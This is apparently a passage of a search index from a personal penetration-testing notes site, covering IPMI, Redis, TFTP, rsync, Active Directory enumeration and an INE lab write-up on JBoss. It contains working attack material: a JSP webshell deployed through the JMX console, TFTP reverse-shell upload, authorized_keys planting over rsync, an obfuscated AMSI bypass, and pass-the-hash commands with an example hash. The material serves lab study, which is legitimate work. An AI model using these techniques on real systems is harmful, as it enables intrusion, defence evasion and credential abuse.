    • Communications Interfaces - local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus.

    Baseboard Management Controllers (BMCs): Systems that use the IPMI protocol.

    BMCs are built into many motherboards but can also be added to a system as a PCI card. Most servers either come with a BMC or support adding a BMC. The most common BMCs we often see during internal penetration tests are HP iLO, Dell DRAC, and Supermicro IPMI.

    If we can access a BMC during an assessment, we would gain full access to the host motherboard and be able to monitor, reboot, power off, or even reinstall the host operating system. Gaining access to a BMC is nearly equivalent to physical access to a system.

    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#resources","title":"Resources","text":"
    • hacktricks: https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"6379-redis/","title":"6379 redis","text":"","tags":["redis","port 6379"]},{"location":"6379-redis/#description","title":"Description","text":"

    Redis (REmote DIctionary Server) is an open-source advanced NoSQL key-value data store used as a database, cache, and message broker. The Redis command line interface (redis-cli) is a terminal program used to send commands to and read replies from the Redis server. Redis popularized the idea of a system that can be considered a store and a cache at the same time.Redis is an open-source, in-memory key-value data store. Whether you\u2019ve installed Redis locally or you\u2019re working with a remote instance, you need to connect to it in order to perform most operations.

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#the-server","title":"The server","text":"

    Redis runs as server-side software so its core functionality is in its server component. The server listens for connections from clients, programmatically or through the command-line interface.

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#the-cli","title":"The CLI","text":"

    The command-line interface (CLI) is a powerful tool that gives you complete access to Redis\u2019s data and its functionalities if you are developing a software or tool that needs to interact with it.

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#database","title":"Database","text":"

    The database is stored in the server's RAM to enable fast data access. Redis also writes the contents of the database to disk at varying intervals to persist it as a backup, in case of failure.

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#install-redis-in-your-kali","title":"Install redis in your kali","text":"","tags":["redis","port 6379"]},{"location":"6379-redis/#prerequisites","title":"Prerequisites","text":"

    If you're running a very minimal distribution (such as a Docker container) you may need to install lsb-release first:

    sudo apt install lsb-release\n

    Add the repository to the apt index, update it, and then install:

    curl -fsSL https://packages.redis.io/gpg | sudo gpg --dearmor -o /usr/share/keyrings/redis-archive-keyring.gpg\n\necho \"deb [signed-by=/usr/share/keyrings/redis-archive-keyring.gpg] https://packages.redis.io/deb $(lsb_release -cs) main\" | sudo tee /etc/apt/sources.list.d/redis.list\n\nsudo apt-get update\n\nsudo apt-get install redis\n
    ","tags":["redis","port 6379"]},{"location":"6379-redis/#to-connect-to-a-terminal","title":"To connect to a terminal","text":"

    First thing to know is that you can use \u201ctelnet\u201d (usually on Redis default port 6379)

    telnet localhost 6379\n

    If you have redis-server installed locally, you can connect to the Redis instance with the redis-cli command.

    If you want to connect to a remote Redis datastore, you can specify its host and port numbers with the -h and -p flags, respectively. Also, if you\u2019ve configured your Redis database to require a password, you can include the -a flag followed by your password in order to authenticate:

    redis-cli -h host -p port_number -a password\n

    If you\u2019ve set a Redis password, clients will be able to connect to Redis even if they don\u2019t include the -a flag in their redis-cli command. However, they won\u2019t be able to add, change, or query data until they authenticate. To authenticate after connecting, use the auth command followed by the password:

    auth password\n

    If the password passed to auth is valid, the command will return OK. Otherwise, it will return an error.

    redis-cli -h 10.129.124.88\n

    Upon a successful connection with the Redis server, we should be able to see a prompt in the terminal as:

    IP:6379>\n

    One of the basic Redis enumeration commands is info which returns information and statistics about the Redis server.

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#dumping-database","title":"Dumping Database","text":"

    Inside Redis the databases are numbers starting from 0. You can find if anyone is used in the output of the command info inside the \"Keyspace\" chunk:

    # Keyspace\ndb0:keys=4, expires=0, avg_ttl=0\ndb1:keys=2, expires=0, avg_ttl=0\n

    Or you can just get all the keyspaces (databases) with:

    INFO keyspace\n

    Redis has a concept of separated namespaces called \u201cdatabases\u201d. You can select the database number you want to use with \u201cSELECT\u201d. By default the database with index 0 is used.

    # Select database\nredis 127.0.0.1:6379> SELECT 1\n\n# To see all keys in a given database. First, you enter in it with \"SELECT <number>\" and then\nredis 127.0.0.1:6379> keys *\n\n# To retrieve a specific key\nredis 127.0.0.1:6379> get flag\n
    ","tags":["redis","port 6379"]},{"location":"6653-openflow/","title":"6653 Openflow","text":"

    The OpenFlow protocol operates over TCP, with a default port number of 6653. This protocol operates between an SDN controller and an SDN-controlled switch or other device implementing the OpenFlow API.

    ","tags":["Openflow","port 6653"]},{"location":"69-tftp/","title":"69 - ftpt","text":"

    Trivial File Transfer Protocol (TFTP) uses UDP port 69 and requires no authentication\u2014clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol (namely lack of authentication and no transport security), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.

    You can spot the open port after running a UDP scan. But also, when reading /etc/passwd, you might find service/user tftp.

    Trivial File Transfer Protocol (TFTP) is a simple protocol that provides basic file transfer function with no user authentication. TFTP is intended for applications that do not need the sophisticated interactions that File Transfer Protocol (FTP) provides.

    UDP provides a mechanism to detect corrupt data in packets, but it does not attempt to solve other problems that arise with packets, such as lost or out of order packets. It is implemented in the transport layer of the OSI Model, known as a fast but not reliable protocol, unlike TCP, which is reliable, but slower then UDP. Just like how TCP contains open ports for protocols such as HTTP, FTP, SSH and etcetera, the same way UDP has ports for protocols that work for UDP.

    ","tags":["pentesting"]},{"location":"69-tftp/#enumeration","title":"Enumeration","text":"
    nmap -n -Pn -sU -p69 -sV --script tftp-enum $ip\n
    ","tags":["pentesting"]},{"location":"69-tftp/#exploitation","title":"Exploitation","text":"

    You can use Metasploit or Python to check if you can download/upload files:

    Module: auxiliary/admin/tftp/tftp_transfer_util

    Also you can exploit manually. Install tftp client:

    # Installing a tftp server\nsudo apt-get install tftpd-hpa\n\n# Installing a tftp client\nsudo apt install tftp\n

    For available commands:

    man tftp\n

    Upload your pentesmonkey shell with:

    put pentesmonkey.php\n

    Where does it get uploaded? Depends. But The default configuration file for tftpd-hpa is /etc/default/tftpd-hpa. The directory is configured there under the parameter TFTP_DIRECTORY= With that information, you can access the directory and from there launch your reverse shell.

    ","tags":["pentesting"]},{"location":"69-tftp/#related-labs","title":"Related labs","text":"

    HackTheBox machine: included.

    ","tags":["pentesting"]},{"location":"7z/","title":"7z","text":""},{"location":"7z/#installation","title":"Installation","text":"
    sudo apt install p7zip-full\n
    "},{"location":"7z/#basic-usage","title":"Basic usage","text":"
    # Extract file\n7z x ~/archive.7z\n\n# a : Add files to archive\n# b : Benchmark\n# d : Delete files from archive\n# e : Extract files from archive (without using directory names)\n# h : Calculate hash values for files\n# i : Show information about supported formats\n# l : List contents of archive\n# rn : Rename files in archive\n# t : Test integrity of archive\n# u : Update files to archive\n# x : eXtract files with full paths\n
    "},{"location":"8080-jboss/","title":"8080 JBoss AS Instance 6.1.0","text":"

    Copied from INE lab: HTML Adapter to Root

    Step 1:\u00a0Open the lab link to access the Kali GUI instance.

    Step 2:\u00a0Check if the provided machine/domain is reachable.

    Command:

    ping -c3 demo.ine.local\n

    The provided machine is reachable.

    Step 3:\u00a0Check open ports on the provided machine.

    Command:

    nmap -sS -sV demo.ine.local\n

    Multiple ports are open on the target machine.

    Some notable services include Java RMI, Apache Tomcat, and the JBoss application server.

    What is Java RMI?

    The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

    Reference:\u00a0https://docs.oracle.com/javase/tutorial/rmi/index.html

    What is Apache Tomcat?

    Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a \"pure Java\" HTTP web server environment in which Java code can run.

    Reference:\u00a0https://en.wikipedia.org/wiki/Apache_Tomcat

    What is JBoss application server?

    JBoss application server is an open-source platform, developed by Red Hat, used for implementing Java applications and a wide variety of other software applications. You can build and deploy Java services to be scaled to fit the size of your business.

    Reference:\u00a0https://www.dnsstuff.com/what-is-jboss-application-server

    Step 4:\u00a0Check the application served by Apache Tomcat.

    Open the following URL in the browser:

    URL:\u00a0http://demo.ine.local:8080

    Notice that the target is serving the JBoss application server (version 6.1.0).

    Step 5:\u00a0Access the JMX console.

    Click on the\u00a0JMX Console\u00a0link:

    What is JMX?

    Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean).

    Reference:\u00a0https://en.wikipedia.org/wiki/Java_Management_Extensions

    Using the JMX console, we can manage the application and, therefore, alter it to execute malicious code on the target server and gain remote code execution.

    What is an MBean?

    An MBean is a managed Java object, similar to a JavaBeans component, that follows the design patterns set forth in the JMX specification. An MBean can represent a device, an application, or any resource that needs to be managed.

    Reference:\u00a0https://docs.oracle.com/javase/tutorial/jmx/mbeans/index.html

    Once the JMX Console is clicked, you should be presented with an authentication dialog:

    Searching online for the default credentials for JBoss:

    Click on the\u00a0StackOverflow link\u00a0from the results:

    The default credentials for JBoss web console are:

    Username:\u00a0admin Password:\u00a0admin

    Submit these credentials to the authentication dialog:

    The above credentials were accepted, and the login was successful!

    You should have access to the\u00a0JMX Agent View\u00a0page now.

    Using this page, one can manage the deployed applications and even alter them.

    Step 6:\u00a0Search for the\u00a0MainDeployer\u00a0(JBoss System API).

    Apply the following filter:

    Filter:

    jboss.system*\n

    Select the entry for\u00a0MainDeployer.

    Information:\u00a0The MainDeployer service can be used to manage deployments on the JBoss application server. For that reason, this API is quite crucial from a pentester's perspective.

    Once the\u00a0MainDeployer\u00a0service is selected, you should see the following page:

    Scroll down to the\u00a0redeploy\u00a0attribute. Make sure the\u00a0redeploy\u00a0attribute accepts a URL as the input (java.net.URL):

    We will be invoking this method to deploy a malicious JSP application, one that gives us a webshell.

    Step 7:\u00a0Prepare the payload for deployment.

    Head over to the following URL:

    URL:\u00a0https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp

    Open the code in raw form (click the\u00a0Raw\u00a0button):

    Copy the payload (press\u00a0CTRL+SHIFT+ALT) and save it as\u00a0backdoor.jsp:

    <%@ page import=\"java.util.*,java.io.*\"%>\n<%\n//\n// JSP_KIT\n//\n// cmd.jsp = Command Execution (unix)\n//\n// by: Unknown\n// modified: 27/06/2003\n//\n%>\n<HTML><BODY>\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n    out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n    Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n    OutputStream os = p.getOutputStream();\n    InputStream in = p.getInputStream();\n    DataInputStream dis = new DataInputStream(in);\n    String disr = dis.readLine();\n    while ( disr != null ) {\n        out.println(disr); \n        disr = dis.readLine(); \n        }\n    }\n%>\n</pre>\n</BODY></HTML>\n

    If the GET request contains the\u00a0cmd\u00a0parameter, the specified command is executed, and the results are displayed on the web page.

    Generate a WAR (Web Application Resource or Web application ARchive) file for deployment:

    Commands:

    jar -cvf backdoor.war backdoor.jsp\nfile backdoor.war\n

    The payload application is generated.

    Step 8:\u00a0Deploy the payload application on the target server.

    Check the IP address of the attacker machine:

    Command:

    ip addr\n

    The IP address of the attacker machine is\u00a0192.166.140.2.

    Note:\u00a0The IP addresses assigned to the labs are bound to change with every lab run. Kindly replace the IP addresses in the subsequent commands with the one assigned to your attacker machine. Failing to do that would result in failed exploitation attempts.

    Start a Python-based HTTP server to serve the payload application:

    Command:

    python3 -m http.server 80\n

    Head over to the JMX Console page and under the\u00a0redeploy\u00a0attribute, place the following URL as the parameter:

    URL:

    http://192.166.140.2/backdoor.war\n

    Note:\u00a0Kindly make sure to substitute the correct IP address in the above URL.

    Once the payload application URL is specified, click on the\u00a0Invoke\u00a0button:

    The operation was successful, as shown in the above image!

    Check the terminal where the Python-based HTTP server was running:

    Notice that there is a request from the target machine for the\u00a0backdoor.war\u00a0file.

    Step 9:\u00a0Access the webshell and run OS commands.

    Visit the following URL:

    URL:

    http://demo.ine.local:8080/backdoor/backdoor.jsp\n

    There is a simple webshell.

    Send the\u00a0id\u00a0command:

    We are running as\u00a0root!

    Send the\u00a0pwd\u00a0command:

    List the files in the current directory (ls -al):

    That was all for this lab on abusing a misconfigured JBoss application server to access the JMX console (default credentials) and leveraging it to deploy a webshell.

    To summarize, we performed recon on the target machine to determine the presence of JBoss AS. We found that the JMX console accepted default credentials and leveraged it to deploy a malicious application to execute arbitrary commands on the target server as root.

    ","tags":["jboss","port 8080"]},{"location":"873-rsync/","title":"873 rsync","text":"","tags":["rsync","port 873"]},{"location":"873-rsync/#description","title":"Description","text":"

    rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers. It can be used to copy files locally on a given machine and to/from remote hosts. It is highly versatile and well-known for its delta-transfer algorithm. This algorithm reduces the amount of data transmitted over the network when a version of the file already exists on the destination host. It does this by sending only the differences between the source files and the older version of the files that reside on the destination server. It is often used for backups and mirroring. It finds files that need to be transferred by looking at files that have changed in size or the last modified time. By default, it uses port 873 and can be configured to use SSH for secure file transfers by piggybacking on top of an established SSH server connection.

    ","tags":["rsync","port 873"]},{"location":"873-rsync/#footprinting-rsync","title":"Footprinting rsync","text":"
    sudo nmap -sV -p 873 $ip\n

    We can next probe the service a bit to see what we can gain access to:

    nc -nv $ip 873\n

    If some share is returned, we could go further by enumerating the share:

    rsync -av --list-only rsync://$ip$/<nameOfShare>\n

    nmap script to enumerate shares:

    nmap -sV --script \"rsync-list-modules\" -p <PORT> $ip\n

    metasploit module to enumerate shares

    use auxiliary/scanner/rsync/modules_list\n

    If IPv6 is in use:

    # Example using IPv6 and a different port\nrsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730\n
    ","tags":["rsync","port 873"]},{"location":"873-rsync/#connect-to-the-service","title":"Connect to the service","text":"
    rsync rsync://IP\n
    ","tags":["rsync","port 873"]},{"location":"873-rsync/#basic-rsync-commands","title":"Basic rsync commands","text":"

    General syntax:

    rsync [OPTION] ... [USER@]HOST::SRC [DEST]\n
    # List content\nrsync IP::\n\n# List recursively a directory\nrsync -r IP::folder\n\n# Download a file from  the server to your machine\nrsync IP::folder/sourcefile.txt destinationfile.txt    \n\n# Downloa a folder\nrsync -r IP::folder/sourcefile.txt destinationfile.txt   \n
    ","tags":["rsync","port 873"]},{"location":"873-rsync/#brute-force","title":"Brute force","text":"

    Once you have the list of modules you have a few different options depending on the actions you want to take and whether or not authentication is required. If authentication is not required you can list a shared folder:

    rsync -av --list-only rsync://$ip$/<nameOfShared>\n

    And copy all files to your local machine via the following command:

    rsync -av rsync://$ip:8730/<nameOfShared>./rsyn_shared\n

    This recursively transfers all files from the directory <nameOfShared> on the machine $ip into the ./rsync_shared directory on the local machine. The files are transferred in \"archive\" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer.

    If you have credentials you can list/download a shared name using (the password will be prompted):

    rsync -av --list-only rsync://<username>@$ip/<nameOfShared>\nrsync -av \n\nrsync://<username>@$ip$:8730/<nameOfShared> ./rsyn_shared\n

    You could also upload some content using rsync (for example, in this case we can upload an authorized_keys file to obtain access to the box):

    rsync -av home_user/.ssh/ rsync://<username>@$ip/home_user/.ssh\n
    ","tags":["rsync","port 873"]},{"location":"acronyms/","title":"Acronyms","text":""},{"location":"acronyms/#a","title":"A","text":"Acronym Expression"},{"location":"acronyms/#b","title":"B","text":"Acronym Expression BFLA Broken Funtion Level Authorization BOLA Broken Access Level Authorization"},{"location":"acronyms/#c","title":"C","text":"Acronym Expression"},{"location":"acronyms/#d","title":"D","text":"Acronym Expression"},{"location":"acronyms/#e","title":"E","text":"Acronym Expression"},{"location":"acronyms/#f","title":"F","text":"Acronym Expression"},{"location":"acronyms/#g","title":"G","text":"Acronym Expression"},{"location":"acronyms/#h","title":"H","text":"Acronym Expression"},{"location":"acronyms/#i","title":"I","text":"Acronym Expression IGA Identity Governance and Administration ILM Identity Lifecycle Management"},{"location":"acronyms/#j","title":"J","text":"Acronym Expression"},{"location":"acronyms/#k","title":"K","text":"Acronym Expression"},{"location":"acronyms/#l","title":"L","text":"Acronym Expression"},{"location":"acronyms/#m","title":"M","text":"Acronym Expression"},{"location":"acronyms/#n","title":"N","text":"Acronym Expression"},{"location":"acronyms/#o","title":"O","text":"Acronym Expression OTP One Time Password"},{"location":"acronyms/#p","title":"P","text":"Acronym Expression"},{"location":"acronyms/#q","title":"Q","text":"Acronym Expression"},{"location":"acronyms/#r","title":"R","text":"Acronym Expression RBAC Role Based Access Control"},{"location":"acronyms/#s","title":"S","text":"Acronym Expression SOAP Simple Object Access Protocol SCIM System for Cross-domain Identity Management is a standard for automating the exchange of user identity information between service provider and identity providers. It helps with automating functions like provisioning or deprovisioning of users identities on applications integrated with the identity provider."},{"location":"acronyms/#t","title":"T","text":"Acronym Expression"},{"location":"acronyms/#u","title":"U","text":"Acronym Expression"},{"location":"acronyms/#v","title":"V","text":"Acronym Expression"},{"location":"acronyms/#w","title":"W","text":"Acronym Expression"},{"location":"acronyms/#x","title":"X","text":"Acronym Expression"},{"location":"acronyms/#y","title":"Y","text":"Acronym Expression"},{"location":"acronyms/#z","title":"Z","text":"Acronym Expression"},{"location":"active-directory-ldap/","title":"Active Directory - LDAP","text":"

    Active Directory (AD) is a directory service for Windows network environments.

    In the context of Active Directory, a forest is a collection of one or more domain trees that share a common schema and global catalog, while a domain is a logical unit within a forest that represents a security boundary for authentication and authorization purposes.

    And what about LDAP? See here.

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#tools","title":"Tools","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#xfreerdp","title":"xfreerdp","text":"

    See cheat sheet.

    xfreerdp /v:$ip /u:htb-student /p:<password> /cert-ignore\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#rsat-remote-server-administration-tools","title":"RSAT (Remote Server Administration Tools)","text":"

    RSAT (Remote Server Administration Tools) cheat sheet:

    # Check if RSAT tools are installed\nGet-WindowsCapability -Name RSAT* -Online \\| Select-Object -Property Name, State\n\n# Install all RSAT tools\nGet-WindowsCapability -Name RSAT* -Online \\| Add-WindowsCapability \u2013Online\n\n# Install a specific RSAT tool, for instance Rsat.ActiveDirectory.DS-LDS.Tools \nAdd-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0  \u2013Online\n

    Once installed, all of the tools will be available under: Control Panel> All Control Panel Items >Administrative Tools.

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypassing","title":"Bypassing","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypass-execution-policy","title":"Bypass Execution Policy","text":"
    powershell -ep bypass\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypass-amsi","title":"Bypass AMSI","text":"
    **S`eT-It`em ( 'V'+'aR' +\u00a0 'IA' + ('blE:1'+'q2')\u00a0 + ('uZ'+'x')\u00a0 ) ( [TYpE](\u00a0 \"{1}{0}\"-F'F','rE'\u00a0 ) )\u00a0 ;\u00a0 \u00a0 (\u00a0 \u00a0 Get-varI`A`BLE\u00a0 ( ('1Q'+'2U')\u00a0 +'zX'\u00a0 )\u00a0 -VaL\u00a0 ).\"A`ss`Embly\".\"GET`TY`Pe\"((\u00a0 \"{6}{3}{1}{4}{2}{0}{5}\" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')\u00a0 ) ).\"g`etf`iElD\"(\u00a0 ( \"{0}{2}{1}\" -f('a'+'msi'),'d',('I'+'nitF'+'aile')\u00a0 ),(\u00a0 \"{2}{4}{0}{1}{3}\" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'\u00a0 )).\"sE`T`VaLUE\"(\u00a0 ${n`ULl},${t`RuE} )**\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#run-a-utility-as-another-user","title":"Run a utility as another user","text":"
    # Run a utility as another user\nrunas /netonly /user:htb.local\\jackie.may powershell\n\n# Run an utility as another user with rubeus. Passing clear text credentials\nrubeus.exe asktgt /user:jackie.may /domain:htb.local /dc:10.10.110.100 /rc4:ad11e823e1638def97afa7cb08156a94\n\n# Run an utility as another user with mimikatz.exe. Passing clear text credentials\nmimikatz.exe sekurlsa::pth /domain:htb.local /user:jackie.may /rc4:ad11e823e1638def97afa7cb08156a94\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#enumeration","title":"Enumeration","text":"

    Basic reconnaissance:\u00a0Who I am, where I am and what permissions I have.

    whoami\nhostname\nnet localgroup administrators\n\n# View a user's current rights\nwhoami /priv\n

    Tool for enumeration:

    • Enumeration with LDAP queries
    • PowerView.ps1 from PowerSploit project (powershell).
    • The ActiveDirectory PowerShell module (powershell).
    • BloodHound (C# and PowerShell Collectors).
    • SharpView (C#).

    A basic AD user account with no added privileges can be used to enumerate the majority of objects contained within AD, including but not limited to:

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#1-domain-computers","title":"1. Domain Computers","text":"
    # Use ADSI to search for all computers\n([adsisearcher]\"(&(objectClass=Computer))\").FindAll()\n\n#Query for installed software\nget-ciminstance win32_product \\| fl\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#2-domain-users","title":"2. Domain Users","text":"

    Two ways. First, if we compromise a domain-joined system (or a client has you perform an AD assessment from one of their workstations) we can leverage RSAT to enumerate AD (Active Directory Users and Computers and ADSI Edit modules). Second, we can enumerate the domain from a non-domain joined host (provided that it is in a subnet that communicates with a domain controller) by launching any RSAT snap-ins using \"runas\" from the command line.

    # Gets one or more Active Directory users.\nGet-ADUser\n\n# List disabled users\nGet-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select name\n\n# Count all users in an OU\n(Get-ADUser -SearchBase \"OU=Employees,DC=INLANEFREIGHT,DC=LOCAL\" -Filter *).count\n

    We can also open the MMC Console from a non-domain joined computer using the following command syntax (See here how to deal with following steps the MMC interface):

    runas /netonly /user:Domain_Name\\Domain_USER mmc\n

    Also, NT Authority/System is a LocalSystem account built-in in Windows operating systems, used by the service control manager. Having SYSTEM-level access within a domain environment is nearly equivalent to having a domain user account. The only real limitation is not being able to perform cross-trust Kerberos attacks such as Kerberoasting ( See techniques to gain SYSTEM-level access on a host).

    Enumerating with powerview.ps1

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#3-domain-group-information","title":"3. Domain Group Information","text":"
    # Get all administrative groups \nGet-ADGroup -Filter \"adminCount -eq 1\" \\| select Name\n\n# LDAP query to return all AD groups\nGet-ADObject -LDAPFilter '(objectClass=group)' \\| select cn\n\n# Get AD groups using WMI \nGet-WmiObject -Class win32_group -Filter \"Domain='INLANEFREIGHT'\"\n\n# Get information about an specific AD group\nGet-ADGroup -Identity \"<GROUP NAME>\" -Properties *\n

    Domain Groups of interest:

    Get-ADGroup -Identity \"<GROUP NAME>\" -Properties *\n

    These are some groups with special permissions that, if missconfigured, might be exploited:

    # Schema Admins | The Schema Admins group is a high privileged group in a forest root domain. The membership of this group must be limited. This group is use to modify the schema of forest. Additional accounts must only be added when changes to the schema are necessary and then must be removed. By default, the Administrator account is a member of this group. Because this group has significant power in the forest, add users with caution. Members can modify the Active Directory schema structure and can backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.\nGet-ADGroup -Identity \"Schema Admins\" -Properties *\n\n# Default Administrators | Domain Admins and Enterprise Admins \"super\" groups. A built-in group . Grants complete and unrestricted access to the computer, or if the computer is promoted to a domain controller, members have unrestricted access to the domain. This group cannot be renamed, deleted, or moved. This built-in group controls access to all the domain controllers in its domain, and it can change the membership of all administrative groups. Membership can be modified by members of the following groups: the default service Administrators, Domain Admins in the domain, or Enterprise Admins.\nGet-ADGroup -Identity \"Administrators\" -Properties *\n\n# Server Operators | A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer. Members can modify services, access SMB shares, and backup files. \nGet-ADGroup -Identity \"Server Operators\" -Properties *\n\n# Backup Operators | A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down. Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs. \nGet-ADGroup -Identity \"Backup Operators\" -Properties *\n\n# Print Operators | A built-in group that exists only on domain controllers. By default, the only member is the Domain Users group. Print Operators can manage printers and document queues. They can also manage Active Directory printer objects in the domain. Members of this group can locally sign in to and shut down domain controllers in the domain. Because members of this group can load and unload device drivers on all domain controllers in the domain, add users with caution. This group cannot be renamed, deleted, or moved. Members are allowed to logon to DCs locally and \"trick\" Windows into loading a malicious driver. \nGet-ADGroup -Identity \"Print Operators\" -Properties *\n\n# Hyper-V Administrators | Members of the Hyper-V Administrators group have complete and unrestricted access to all the features in Hyper-V. Adding members to this group helps reduce the number of members required in the Administrators group, and further separates access. If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.\nGet-ADGroup -Identity \"Hyper-V Administrators\" -Properties *\n\n# Account Operators | Grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers. Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights. Members can modify non-protected accounts and groups in the domain. \nGet-ADGroup -Identity \"Account Operators\" -Properties *\n\n# Remote Desktop Users | The Remote Desktop Users group on an RD Session Host server is used to grant users and groups permissions to remotely connect to an RD Session Host server. This group cannot be renamed, deleted, or moved. It appears as a SID until the domain controller is made the primary domain controller and it holds the operations master role (also known as flexible single master operations or FSMO). Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol.\nGet-ADGroup -Identity \"Remote Desktop Users\" -Properties *\n\n# Remote Management Users | Members of the Remote Management Users group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. The Remote Management Users group is generally used to allow users to manage servers through the Server Manager console, whereas the WinRMRemoteWMIUsers_ group is allows remotely running Windows PowerShell commands. Members are allowed to logon to DCs with PSRemoting (This group is sometimes added to the local remote management group on non-DCs). \nGet-ADGroup -Identity \"Remote Management Users\" -Properties *\n\n# Group Policy Creator Owners | A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator. The default owner of a new Group Policy object is usually the user who created it. If the user is a member of Administrators or Domain Admins, all objects that are created by the user are owned by the group. Owners have full control of the objects they own. Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.\nGet-ADGroup -Identity \"Group Policy Creator Owners\" -Properties *\n\n# DNSAdmins | Members of this group have administrative access to the DNS Server service. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group has no default members. Members have the ability to load a DLL on a DC but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.\nGet-ADGroup -Identity \"DNSAdmins\" -Properties *\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#4-default-domain-policy","title":"4. Default Domain Policy","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#5-domain-functional-levels","title":"5. Domain Functional Levels","text":"
    # Get hostnames with the word \"SQL\" in their hostname \nGet-ADComputer  -Filter \"DNSHostName -like 'SQL*'\"` \n

    6. Password Policy

    7. Group Policy Objects (GPOs)

    8. Kerberos Delegation

    # Find admin users that don't require Kerberos Pre-Auth\nGet-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'}\n

    9. Domain Trusts

    10. Access Control Lists (ACLs)

    #  Enumerate UAC values for admin users\nGet-ADUser -Filter {adminCount -gt 0} -Properties admincount,useraccountcontrol \n

    11. Remote access rights

    Active Directory can be easily misconfigurable. These are common attacks:

    • Kerberoasting / ASREPRoasting
    • NTLM Relaying
    • Network traffic poisoning
    • Password spraying
    • Kerberos delegation abuse
    • Domain trust abuse
    • Credential theft
    • Object control
